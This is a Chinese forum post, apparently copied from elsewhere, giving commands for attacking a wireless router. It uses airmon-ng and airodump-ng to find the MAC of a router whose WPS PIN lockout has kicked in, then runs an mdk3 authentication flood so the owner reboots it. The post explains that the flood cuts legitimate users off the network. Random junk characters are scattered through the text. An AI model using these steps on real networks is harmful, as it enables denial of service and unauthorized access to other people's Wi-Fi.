上等兵
- 注册时间
- 2013-6-6
- 金币
- 48 个
- 威望
- 0 个
- 荣誉
- 0 个
累计签到:2 天 连续签到:0 天 [LV.20]漫游旅程
|
首先检测网卡:8 p( c: t% ]- p
ifconfig -a: W3 [( k( g# j
然后模拟端口:% o2 v9 L! i+ z- w7 W8 {# f8 X
airmon-ng start wlan0
: f/ p( O. I( J5 d6 h/ L, W接下来用:/ P% h/ {8 E; i* ?" Y; |3 [% @2 F+ y( Z7 b& k
airodump-ng mon04 X* C8 ]9 V0 ?9 i/ \( y
扫描ap找到你pin死的路由器mac
- ~- i' W& C9 p9 G: s" a' ?1 B用mdk3 做身份验证攻击
$ m0 k- x( A; x% t1 \) ~mdk3 mon0 a -a mac(被pin死的路由器的mac)
7 A3 f- H7 D8 ?2 O6 K' U: E! U6 ~身份验证攻击效果说明:
7 ` W' c# C4 I1 w/ z" ~; ?此攻击是针对无线AP的洪水攻击,又叫做身份验证攻击。其原理就是向AP发动大量的虚假的链接请求,这种请求数量一旦超 过了无线AP所能承受的范围,AP就会自动断开现有链接,使合法用户无法使用无线网络。迫使路由主人重启路由器。.
X. ^3 p7 Y) a4 s k1 j( k, c
! J! w; J( Y F6 }& G8 @3 W以上是复制的 |
|